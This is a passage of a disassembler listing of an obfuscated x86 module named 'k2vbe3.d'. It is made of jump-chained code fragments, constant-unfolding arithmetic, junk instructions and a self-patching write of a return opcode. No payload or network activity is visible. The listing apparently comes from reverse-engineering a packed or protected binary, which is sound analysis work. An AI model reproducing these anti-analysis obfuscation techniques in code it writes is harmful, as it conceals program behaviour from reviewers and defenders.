		mov	edx, eax
		call	sub_45B74D
		xchg	esi, [esp+0]
		mov	edx, esi
		pop	esi
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_450D38
; END OF FUNCTION CHUNK	FOR sub_4536DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_44A23E:				; CODE XREF: sub_44469A+11A1Aj
		jl	loc_43E046
		mov	ebx, [ecx]
		sbb	esi, eax
		jmp	loc_43E046
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------

loc_44A24D:				; CODE XREF: k2vbe3.d:00440181j
		pop	esi
		and	edx, 59D42CEBh
		or	edx, 0E0E557E5h
		add	edx, 65C69B1h
		jmp	loc_44F4DF
; ---------------------------------------------------------------------------

locret_44A265:				; CODE XREF: k2vbe3.d:0044D469j
		retn
; ---------------------------------------------------------------------------

loc_44A266:				; CODE XREF: k2vbe3.d:0044AC1Ej
		jmp	loc_441FA3
; ---------------------------------------------------------------------------

loc_44A26B:				; CODE XREF: k2vbe3.d:0045ACFBj
		push	0
		call	sub_44AFD4
		pop	eax
		cmp	dword ptr [eax], 0
		jnz	loc_45ACF4
		jmp	loc_45185E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44A281:				; CODE XREF: sub_45A323:loc_44BDB6j
		push	35F1A53Ah
		and	ecx, ebp
		jmp	loc_44FE77
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_44A28D	proc near		; DATA XREF: sub_45BF01-1C17Co

; FUNCTION CHUNK AT 00452C31 SIZE 00000005 BYTES

		mov	eax, [esp+0]
		push	edi
		push	offset sub_44934C
		jmp	loc_452C31
sub_44A28D	endp

; ---------------------------------------------------------------------------
		push	offset loc_45142E
		jmp	loc_4543C8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445FE0

loc_44A2A5:				; CODE XREF: sub_445FE0:loc_452143j
		push	0EB03CBC7h
		pop	eax
		rol	eax, 0Ah
		or	eax, 7D0CE5F2h
		and	eax, 7E2E64B6h
		call	sub_44B335
; END OF FUNCTION CHUNK	FOR sub_445FE0
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_44A2BF:				; CODE XREF: k2vbe3.d:00442BFCj
					; sub_43DFE1:loc_44BA39j
		jmp	loc_449A38
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_44A2C4:				; CODE XREF: sub_456666:loc_43FC26j
					; k2vbe3.d:00450410j
		mov	[ebp-1Ch], eax

loc_44A2C7:				; CODE XREF: k2vbe3.d:004407DDj
		inc	dword ptr [ebp-20h]
		mov	eax, [ebp-1Ch]
		and	eax, 0FFh
		jmp	loc_451DC2
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B4A2

loc_44A2D7:				; CODE XREF: sub_45B4A2:loc_446CBAj
		popf
		sbb	eax, esi
		jmp	loc_441C8B
; END OF FUNCTION CHUNK	FOR sub_45B4A2

; =============== S U B	R O U T	I N E =======================================



sub_44A2DF	proc near		; CODE XREF: sub_44635Ej
					; DATA XREF: sub_446353+1o

; FUNCTION CHUNK AT 004467CC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D680 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452A1F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00455644 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00455994 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004577E4 SIZE 0000001D BYTES

		push	0E2F46E7Ch
		pop	ebx
		rol	ebx, 1Ch
		sub	ebx, 35A4FCDEh
		js	loc_4577E4

loc_44A2F4:				; CODE XREF: k2vbe3.d:0044AA47j
		jmp	sub_4559F4
sub_44A2DF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B495

loc_44A2F9:				; CODE XREF: sub_44B495:loc_45879Aj
		shr	edx, 2

loc_44A2FC:				; CODE XREF: sub_44B495:loc_443743j
		push	offset loc_446998
		jmp	nullsub_68
; END OF FUNCTION CHUNK	FOR sub_44B495

; =============== S U B	R O U T	I N E =======================================



sub_44A306	proc near		; CODE XREF: sub_451E00+Cp
					; k2vbe3.d:0045548Dj

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00442C74 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442DFE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00447C14 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448A69 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044AC09 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F2D5 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004551C4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045AABD SIZE 0000000F BYTES

		xchg	eax, [esp+4+var_4]
		pop	eax
		push	294EE45Bh
		pop	eax
		rol	eax, 1Ah
		and	eax, 3572D576h
		add	eax, 0DC257AE0h
		jmp	loc_442C74
sub_44A306	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_44A324:				; CODE XREF: sub_43C3A9:loc_458EB7j
		ror	ecx, 0Fh
		or	edx, 3469D766h
		adc	ebp, edx
		or	ebp, 0FFD9A68Ch
		jmp	loc_457BA4
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4590BA

loc_44A33A:				; CODE XREF: sub_4590BA:loc_45220Bj
		jnz	loc_44230A
		jmp	loc_456D21
; END OF FUNCTION CHUNK	FOR sub_4590BA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_441. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44A346:				; CODE XREF: k2vbe3.d:00450543j
		jmp	sub_445047
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441885

loc_44A34B:				; CODE XREF: sub_441885-EA0j
		jmp	loc_44BE0F
; END OF FUNCTION CHUNK	FOR sub_441885
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_44A350:				; CODE XREF: sub_44469A:loc_4490E6j
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44462D
		jmp	loc_45C07E
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_44A35F:				; CODE XREF: sub_43DFE1:loc_4477DFj
		jz	loc_43C99F

loc_44A365:				; CODE XREF: sub_4597E6-1853j
		jmp	loc_44B388
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_44A36A:				; CODE XREF: sub_44128B+913Dj
		jmp	loc_43C5A4
; END OF FUNCTION CHUNK	FOR sub_44128B
; ---------------------------------------------------------------------------
		jnz	loc_43F109
		xor	ecx, 6B0F49E3h
		jmp	loc_43C99F
; ---------------------------------------------------------------------------

loc_44A380:				; CODE XREF: k2vbe3.d:0044AEB6j
		jnz	loc_457EAB
		jmp	loc_44DB13
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_179. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DCF5

loc_44A38C:				; CODE XREF: sub_45530F-18E1Dj
					; sub_4568DA-7B5Dj ...
		inc	dword ptr [ebp-20h]
		dec	dword ptr [ebp-2Ch]
		jnz	loc_450F80
		jmp	loc_444542
; END OF FUNCTION CHUNK	FOR sub_44DCF5
; ---------------------------------------------------------------------------

loc_44A39D:				; CODE XREF: k2vbe3.d:00458E57j
		push	ebp
		pop	edx
		xchg	edx, [esp]
		mov	ebp, esp
		jmp	loc_4553E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BB88

loc_44A3A9:				; CODE XREF: sub_45BB88:loc_450077j
		mov	esi, edx
; END OF FUNCTION CHUNK	FOR sub_45BB88
; START	OF FUNCTION CHUNK FOR sub_44E542

loc_44A3AB:				; CODE XREF: sub_44E542+6130j
		push	offset loc_43DD10
		jmp	loc_44BBA5
; END OF FUNCTION CHUNK	FOR sub_44E542
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_44A3B5:				; CODE XREF: sub_44128B:loc_456A20j
		push	eax
		push	3E196F70h
		pop	eax
		sub	eax, ds:4000EAh
		test	eax, 40h
		jmp	loc_44A36A
; END OF FUNCTION CHUNK	FOR sub_44128B
; ---------------------------------------------------------------------------

locret_44A3CD:				; CODE XREF: k2vbe3.d:004468F8j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44416D

loc_44A3CE:				; CODE XREF: sub_44416D+C362j
		jmp	loc_459445
; END OF FUNCTION CHUNK	FOR sub_44416D
; ---------------------------------------------------------------------------

loc_44A3D3:				; CODE XREF: k2vbe3.d:004434DBj
		jmp	loc_457F63
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447692

loc_44A3D8:				; CODE XREF: sub_447692-8BE8j
		jmp	loc_444430
; END OF FUNCTION CHUNK	FOR sub_447692
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_44A3DD:				; CODE XREF: sub_43CCD0:loc_448EABj
		jnz	loc_4501F5
		jmp	loc_447E6D
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_130. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44A3E9:				; CODE XREF: k2vbe3.d:0045905Ej
		jmp	loc_449F7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_44A3EE:				; CODE XREF: sub_43CCD0:loc_449144j
		push	7C90CCE9h
		pop	eax
		rol	eax, 0Ch
		add	eax, 0F375513Ah
		jmp	loc_44B1E8
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44A402:				; CODE XREF: sub_45A323:loc_4448DCj
		jz	loc_44C9FA
		jmp	loc_43C049
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A634

loc_44A40D:				; CODE XREF: sub_45A634+1872j
		jnz	loc_43CE76
		jmp	loc_43C898
; END OF FUNCTION CHUNK	FOR sub_45A634
; ---------------------------------------------------------------------------

loc_44A418:				; DATA XREF: sub_457A58+1C6Bo
		xchg	eax, [esp]
		mov	edx, eax
		pop	eax
		mov	eax, [esp]
		push	eax
		jmp	loc_442709
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_44A427:				; CODE XREF: sub_44DB59-2334j
		rol	eax, 4
		sub	eax, 0E877C9E7h
		and	eax, 0EDB76A98h
		or	eax, 1FE31825h
		jnz	loc_44671E

loc_44A442:				; CODE XREF: sub_459AEA-B2Dj
		jmp	nullsub_242
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44364F

loc_44A447:				; CODE XREF: sub_44364F+10j
		jmp	sub_44ED3C
; END OF FUNCTION CHUNK	FOR sub_44364F
; ---------------------------------------------------------------------------
		mov	edx, 0B85D3B5Ch
		jmp	loc_4496FA
; ---------------------------------------------------------------------------
		or	ebp, 7BC4EE40h
		ror	ecx, 1Ah
		jmp	sub_443E64
; ---------------------------------------------------------------------------
		push	0E47E0E9Ch
		pop	eax
		rol	eax, 1Ch
		add	eax, 4B5DFFB5h
		call	sub_4553CC
		mov	ds:dword_41E138, eax
		lea	eax, nullsub_7
		mov	byte ptr [eax],	0C3h
		jmp	loc_43F031
; ---------------------------------------------------------------------------

loc_44A48C:				; CODE XREF: k2vbe3.d:00444E1Cj
		mov	eax, [eax]
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp]
		push	0
		jmp	loc_4593A8
; ---------------------------------------------------------------------------

loc_44A49B:				; CODE XREF: k2vbe3.d:00451447j
		jz	loc_43C285
		jnp	loc_456083
		xchg	ebx, esi
		jmp	loc_43C285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_44A4AE:				; CODE XREF: sub_43C3A9+5C91j
					; sub_443A30:loc_44B1D8j
		add	edx, 0C5A8F547h
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_452791
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44A4BF:				; CODE XREF: sub_44C90E-E331j
		js	loc_43FAEF

loc_44A4C5:				; CODE XREF: sub_44C90E:loc_455343j
		push	offset loc_452A7C
		jmp	nullsub_184
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_44A4CF:				; CODE XREF: sub_444D7B+BAE4j
		or	edx, 0EA7C34D0h
		xor	edx, 6A4D454Bh
		add	edx, ebp
		add	edx, 6FCCC665h
		mov	edx, [edx]
		jmp	loc_454B0B
; END OF FUNCTION CHUNK	FOR sub_444D7B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_59. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_44A4EB:				; CODE XREF: sub_44ED3C+8BD4j
		jmp	loc_44EB1B
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BC3

loc_44A4F0:				; CODE XREF: sub_444BC3+5EA9j
		jmp	nullsub_61
; END OF FUNCTION CHUNK	FOR sub_444BC3

; =============== S U B	R O U T	I N E =======================================



sub_44A4F5	proc near		; DATA XREF: sub_44CDC9+C345o

; FUNCTION CHUNK AT 004580F1 SIZE 00000005 BYTES

		pop	ecx
		mov	edx, [ebp+8]
		push	offset loc_446508
		jmp	loc_4580F1
sub_44A4F5	endp

; ---------------------------------------------------------------------------
		call	sub_4570C0
		add	esp, 10h
		pop	ebp
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44A50F:				; CODE XREF: sub_44C90E-2B9Fj
		jmp	loc_448567
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAEB

loc_44A514:				; CODE XREF: sub_45AAEB+17DBj
		jnb	loc_440F50
		sub	edx, esi
		jl	loc_443BB1
		pushf
		jmp	loc_453900
; END OF FUNCTION CHUNK	FOR sub_45AAEB
; ---------------------------------------------------------------------------

loc_44A528:				; CODE XREF: k2vbe3.d:004553F2j
		push	ecx
		jnz	loc_452729
		push	offset sub_45A980
		jmp	loc_44E411
; ---------------------------------------------------------------------------

loc_44A539:				; CODE XREF: k2vbe3.d:00450C0Cj
		pushf

; =============== S U B	R O U T	I N E =======================================



sub_44A53A	proc near		; CODE XREF: sub_44F1C4+93EAp
		xchg	eax, [esp+0]
		pop	eax
		xor	eax, 6698042h
		push	offset loc_44F59D
		jmp	nullsub_58
sub_44A53A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_44A54E:				; CODE XREF: sub_443A30:loc_45BFA9j
		jz	loc_44C7F8
		jmp	loc_44A729
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------
		sub	ecx, esi
		or	ebp, edi
		jmp	sub_44D863
; ---------------------------------------------------------------------------
		not	ebx
		jmp	sub_448E56
; ---------------------------------------------------------------------------

loc_44A569:				; CODE XREF: k2vbe3.d:0044A68Aj
		adc	ebp, eax

; =============== S U B	R O U T	I N E =======================================



sub_44A56B	proc near		; CODE XREF: sub_447692-B66Cp

; FUNCTION CHUNK AT 004414EF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004474BF SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044C018 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00455321 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_451759
		jmp	loc_4414EF
sub_44A56B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D83F

loc_44A579:				; CODE XREF: sub_43D83F+Dj
		xor	eax, 0F4A5766Dh
		rol	eax, 1Bh
		xor	eax, 0FEC44966h
		add	eax, 0F64D3D05h
		call	sub_44ADEC
		push	offset loc_45B691
		jmp	loc_44BCE9
; END OF FUNCTION CHUNK	FOR sub_43D83F
; ---------------------------------------------------------------------------

loc_44A59D:				; DATA XREF: sub_45156D+26B7o
		push	ecx
		push	2954509Eh
		pop	ecx
		or	ecx, 6BF86816h
		add	ecx, 9445677Eh
		mov	[ecx], eax
		pop	ecx
		lea	eax, loc_45195B
		jmp	loc_458033
; ---------------------------------------------------------------------------
		jg	loc_44932C
		jmp	sub_44314D
; ---------------------------------------------------------------------------

loc_44A5C9:				; DATA XREF: k2vbe3.d:loc_4468F3o
		push	esi
		push	0C81CFB10h
		xchg	ebx, [esp]
		mov	esi, ebx
		pop	ebx
		or	esi, 0E616AC76h
		jmp	loc_457039
; ---------------------------------------------------------------------------

locret_44A5E0:				; CODE XREF: k2vbe3.d:loc_45BC1Aj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EB7

loc_44A5E1:				; CODE XREF: sub_451EB7-5DEFj
		jmp	loc_45C2A3
; END OF FUNCTION CHUNK	FOR sub_451EB7
; ---------------------------------------------------------------------------

loc_44A5E6:				; CODE XREF: k2vbe3.d:loc_440C22j
					; k2vbe3.d:00440C39j
		and	edx, 104C5443h
		call	sub_443FAC

loc_44A5F1:				; CODE XREF: k2vbe3.d:0044862Dj
		jmp	loc_458396
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452255

loc_44A5F6:				; CODE XREF: sub_452255:loc_44C956j
		sub	edx, 0C2944EA0h
		add	edx, 45008B4Fh
		popf
		xchg	edx, [esp+0]
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_452255
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A1B1

loc_44A60B:				; CODE XREF: sub_44A1B1+C30Aj
		push	eax
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-1Ch], 0F6h
		setz	al
		call	sub_456A5F
		pop	ecx
		shl	eax, 7
		jmp	loc_43C885
; END OF FUNCTION CHUNK	FOR sub_44A1B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447594

loc_44A627:				; CODE XREF: sub_447594:loc_450E31j
		push	0C82CBDABh
		pop	ebx

loc_44A62D:				; CODE XREF: sub_44ED3C:loc_44C3D8j
		rol	ebx, 12h
		add	ebx, 3B783A55h
		cmp	ebx, 72755337h
		jmp	loc_454B05
; END OF FUNCTION CHUNK	FOR sub_447594

; =============== S U B	R O U T	I N E =======================================



sub_44A641	proc near		; CODE XREF: k2vbe3.d:00442D50j
					; sub_458863+5p

; FUNCTION CHUNK AT 0043F565 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045B94F SIZE 00000006 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	ebx, eax
		push	690E8231h
		pop	eax
		sub	eax, 2BCB66ECh
		jnb	loc_43F565
sub_44A641	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_443A30

loc_44A659:				; CODE XREF: sub_443A30+ED67j
		jmp	loc_453602
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_44A65E:				; CODE XREF: sub_44471B+12j
		mov	eax, [ebp+8]
		test	byte ptr [eax-8], 10h
		jz	loc_441AA5
		inc	dword ptr [ebp-8]

loc_44A66E:				; CODE XREF: sub_44471B-4005j
					; sub_44471B:loc_458062j
		mov	eax, [ebp-8]
		pop	ecx
		pop	ecx
		jmp	loc_456628
; END OF FUNCTION CHUNK	FOR sub_44471B
; ---------------------------------------------------------------------------

loc_44A678:				; CODE XREF: k2vbe3.d:0043F159j
		pushf

; =============== S U B	R O U T	I N E =======================================



sub_44A679	proc near		; CODE XREF: sub_45A323-17D8Ap

; FUNCTION CHUNK AT 0043F8DE SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004520FF SIZE 00000005 BYTES

		xchg	edi, [esp+0]

loc_44A67C:				; CODE XREF: k2vbe3.d:loc_4527B1j
		pop	edi
		mov	eax, [eax]
		jmp	loc_4520FF
sub_44A679	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jg	loc_452A51
		jmp	loc_44A569
; ---------------------------------------------------------------------------

loc_44A68F:				; DATA XREF: sub_44AFD4+582Eo
		xchg	edi, [esp]
		push	40h
		lea	eax, [ebp-64h]
		push	eax
		jmp	loc_43F347
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468FE

loc_44A69D:				; CODE XREF: sub_4468FE:loc_44E72Cj
		mov	esp, ebp
		pop	ebp
		push	83B56DCEh
		pop	eax
		sub	eax, 0E95F336Ah
		and	eax, 0A8200496h
		sub	eax, 0F6BC1E4Bh
		jmp	loc_43C4D2
; END OF FUNCTION CHUNK	FOR sub_4468FE

; =============== S U B	R O U T	I N E =======================================



sub_44A6BD	proc near		; CODE XREF: k2vbe3.d:0043F251j
					; sub_4424CF+A97Dp ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043CA8F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043D5D6 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043DF2F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043E0D2 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043F4F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440B1F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441572 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441768 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446332 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00447316 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447481 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A76F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C126 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004505BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451270 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004579C7 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045A952 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045AE27 SIZE 00000007 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	eax, [eax+4]
		push	eax
		jmp	loc_43F4F9
sub_44A6BD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44A6CA:				; CODE XREF: k2vbe3.d:0043C235j
		mov	eax, [esp]
		push	edx
		call	sub_455F6B
		push	0FC4D53E1h
		pop	eax
		and	eax, 28C47D25h
		rol	eax, 2
		and	eax, 0E22D58A6h
		jmp	loc_44EC87
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_44A6ED:				; CODE XREF: sub_456666-17B6Dj
		jnz	loc_44F2C8

loc_44A6F3:				; CODE XREF: k2vbe3.d:0045B3FDj
		jmp	loc_43D3CF
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448343

loc_44A6F8:				; CODE XREF: sub_448343+9j
		jmp	loc_453225
; END OF FUNCTION CHUNK	FOR sub_448343
; ---------------------------------------------------------------------------
		cdq
		xchg	ebp, eax
		or	edi, 0C81A19FCh
		jmp	loc_44F2C0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44A70B:				; CODE XREF: sub_45A323+A0j
		jnz	loc_452440
		jmp	loc_44BA00
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44A716:				; CODE XREF: sub_44C90E:loc_447D0Fj
		mov	eax, [ebp-4]
		mov	esp, ebp
		pop	ebp
		retn	8
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450359

loc_44A71F:				; CODE XREF: sub_450359+6F87j
		jmp	loc_44CEC9
; END OF FUNCTION CHUNK	FOR sub_450359
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4512B9

loc_44A724:				; CODE XREF: sub_4512B9+Cj
		jmp	loc_4464CD
; END OF FUNCTION CHUNK	FOR sub_4512B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_44A729:				; CODE XREF: sub_443A30+6B24j
		jmp	loc_43FFC1
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44A72E:				; CODE XREF: sub_44C90E+13j
					; sub_44C90E+5E5Ej
		jnz	loc_449D5F
		cmp	dword ptr [ebp-10Ch], 6D676552h
		jmp	loc_4411EA
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450CBF

loc_44A743:				; CODE XREF: sub_450CBF+82E0j
		jl	sub_44987D
		shr	ebp, 0Bh
		adc	edi, eax

loc_44A74E:				; CODE XREF: k2vbe3.d:004421E9j
					; k2vbe3.d:loc_445EBCj	...
		push	offset loc_43D691
		jmp	loc_458CD2
; END OF FUNCTION CHUNK	FOR sub_450CBF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441885

loc_44A758:				; CODE XREF: sub_441885+15577j
		rol	ecx, 1
		add	ecx, 612547F8h
		call	sub_45496E
; END OF FUNCTION CHUNK	FOR sub_441885
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44A765:				; CODE XREF: sub_44C90E-D1B7j
		jmp	nullsub_216
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44A76A:				; CODE XREF: sub_45A323:loc_43E254j
					; k2vbe3.d:0043E263j
		call	sub_459A9E
; END OF FUNCTION CHUNK	FOR sub_45A323
; START	OF FUNCTION CHUNK FOR sub_44A6BD

loc_44A76F:				; CODE XREF: sub_44A6BD-437Cj
		jmp	loc_4579C7
; END OF FUNCTION CHUNK	FOR sub_44A6BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_44A774:				; CODE XREF: sub_446E24+1CB3j
		jg	loc_44AACF
		push	ecx
		xor	ebx, 4BCE0D7Ah
		jmp	loc_443B4B
; ---------------------------------------------------------------------------

loc_44A786:				; CODE XREF: sub_446E24:loc_448DEFj
		cmp	dword ptr [ebp-4], 2
		jmp	loc_448BCA
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_44A78F:				; CODE XREF: sub_44D298-C765j
					; k2vbe3.d:00444684j ...
		mov	dword ptr [ebp-8], 1
		jmp	loc_4555EE
; END OF FUNCTION CHUNK	FOR sub_44D298

; =============== S U B	R O U T	I N E =======================================



sub_44A79B	proc near		; CODE XREF: k2vbe3.d:0044AEA9p
					; sub_43DFE1:loc_44C3A5j ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00444595 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444A64 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00444BE0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445536 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447CB3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00449657 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044CC49 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CE07 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044D1F8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044E253 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044EF89 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045231F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452D06 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00456874 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004573A0 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004574F7 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045894C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459703 SIZE 0000000B BYTES

		js	loc_44CC49
		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		push	offset sub_43EFC9
		jmp	loc_45894C
sub_44A79B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441409

loc_44A7B1:				; CODE XREF: sub_441409:loc_446975j
		push	offset sub_45ACAE
		jmp	nullsub_159
; END OF FUNCTION CHUNK	FOR sub_441409

; =============== S U B	R O U T	I N E =======================================



